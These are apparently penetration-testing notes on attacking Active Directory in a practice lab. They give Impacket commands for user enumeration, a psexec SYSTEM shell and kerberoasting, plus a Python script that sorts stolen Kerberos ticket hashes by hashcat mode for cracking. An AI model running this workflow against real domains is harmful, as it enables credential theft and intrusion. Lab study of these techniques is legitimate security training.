Active Directory Enum - brief

https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet/tree/master/C%20-%20Local%20Privilege%20Escalation

GetADUsers.py

GetADUsers.py -all <domain>/<username>[:<password>] -dc-ip <IP address of domain controller>

The target is given as domain/username[:password]; if the password is omitted the tool prompts for it. -all returns every user in the domain, including accounts without an email address and disabled accounts, rather than only the enabled ones with mail attributes.

e.g.

GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100

psexec.py

psexec.py is Impacket's reimplementation of the Sysinternals PsExec technique: it authenticates to the target over SMB, copies a service binary with a random name into a writable share (ADMIN$ by default), creates and starts a service through the Service Control Manager, and proxies a fully interactive command prompt running as SYSTEM back over named pipes. Nothing has to be installed on the target beforehand, but the account used must be a local administrator there (it needs write access to the share and the right to create services). It is also noisy: a new service is created and a service-installation event is logged on the target, so expect it to be caught by any monitoring of service creation.

psexec.py <domain>/<username>[:<password>]@<target>

e.g.

psexec.py active.htb/svc_tgs@10.10.10.100

GetUserSPNs.py

This module looks for Service Principal Names (SPNs) registered on normal user accounts rather than machine accounts. Any authenticated domain user can request a service ticket (TGS) for any SPN, and the service portion of that ticket is encrypted with a key derived from the password of the account the SPN runs under. Because user-account passwords are human-chosen and tend to be far weaker than the long random passwords of machine accounts, collecting valid TGS tickets for those SPNs enables an offline brute-force attack against the service account's password (for RC4-HMAC tickets, etype 23, the key is the account's NT hash). This is the kerberoast attack. Tickets encrypted with AES (etypes 17 and 18) can still be attacked but crack much more slowly, so RC4 tickets are the preferred targets.

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs
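Once the tickets are on disk (GetUserSPNs.py -request -outputfile writes one $krb5tgs$ line per SPN), the next practical step is checking which encryption type each ticket uses, because hashcat runs one mode at a time and AES tickets are a much harder target than RC4 ones. The script below is an added example written for these notes, not Impacket code: it parses hash lines in the two formats Impacket emits (RC4-HMAC and AES), validates the checksum length for the encryption type, maps each ticket to its hashcat mode, and groups them so they can be written to one file per mode. The two sample lines are constructed (repeated hex bytes, not real ticket material, and the svc_sql account is invented) so that it runs offline.

```python
"""Triage $krb5tgs$ hashes as written by Impacket's GetUserSPNs.py -request.

Added example for these notes (not part of Impacket). Parses the hash lines,
checks they are well formed, and picks the hashcat mode per encryption type.
"""
import re
from collections import Counter, defaultdict

# RC4-HMAC (etype 23):  $krb5tgs$23$*user$REALM$spn*$checksum$edata
RC4_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$"
)
# AES128/AES256-CTS-HMAC-SHA1-96 (etype 17/18):  $krb5tgs$18$user$REALM$*spn*$checksum$edata
AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$"
)

# hashcat mode for each Kerberos encryption type
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
# checksum length in hex characters: HMAC-MD5 is 16 bytes, HMAC-SHA1-96 is 12 bytes
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}

# Constructed sample output: repeated bytes stand in for real checksum/ciphertext.
# svc_tgs / active/CIFS:445 mirrors the example above; svc_sql is an invented second account.
SAMPLE_HASHES = "\n".join([
    "$krb5tgs$23$*svc_tgs$ACTIVE.HTB$active/CIFS:445*$" + "ab" * 16 + "$" + "cd" * 64,
    "$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/sql.active.htb:1433*$" + "ef" * 12 + "$" + "01" * 64,
])


def parse_krb5tgs(line):
    """Split one hash line into its fields; raise ValueError if it is malformed."""
    line = line.strip()
    m = RC4_RE.match(line) or AES_RE.match(line)
    if m is None:
        raise ValueError("not a $krb5tgs$ hash in Impacket's output format: %r" % line[:40])
    etype = int(m.group("etype"))
    checksum = m.group("checksum")
    if len(checksum) != CHECKSUM_HEX_LEN[etype]:
        raise ValueError("etype %d checksum should be %d hex chars, got %d"
                         % (etype, CHECKSUM_HEX_LEN[etype], len(checksum)))
    return {
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "checksum": checksum,
        "edata": m.group("edata"),
        "hashcat_mode": HASHCAT_MODE[etype],
        # RC4 tickets crack orders of magnitude faster than AES (PBKDF2-derived keys)
        "fast_to_crack": etype == 23,
        "line": line,
    }


def triage(hash_text):
    """Parse every non-empty line and count tickets per hashcat mode."""
    parsed = [parse_krb5tgs(l) for l in hash_text.splitlines() if l.strip()]
    by_mode = Counter(p["hashcat_mode"] for p in parsed)
    return parsed, by_mode


def split_by_mode(parsed):
    """Group raw hash lines by hashcat mode, ready to be written to one file each."""
    groups = defaultdict(list)
    for p in parsed:
        groups[p["hashcat_mode"]].append(p["line"])
    return dict(groups)


if __name__ == "__main__":
    tickets, counts = triage(SAMPLE_HASHES)
    for t in tickets:
        print("%-10s %-35s etype %2d -> hashcat -m %d%s"
              % (t["user"], t["spn"], t["etype"], t["hashcat_mode"],
                 "  (RC4, crack this first)" if t["fast_to_crack"] else ""))
    for mode, lines in split_by_mode(tickets).items():
        print("mode %d: %d ticket(s)" % (mode, len(lines)))
```

In practice you feed the real -outputfile contents to triage(), write each group from split_by_mode() to its own file and run hashcat -m <mode> on each; an account that only ever returns etype 17/18 tickets has RC4 disabled on it and is a noticeably harder target.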
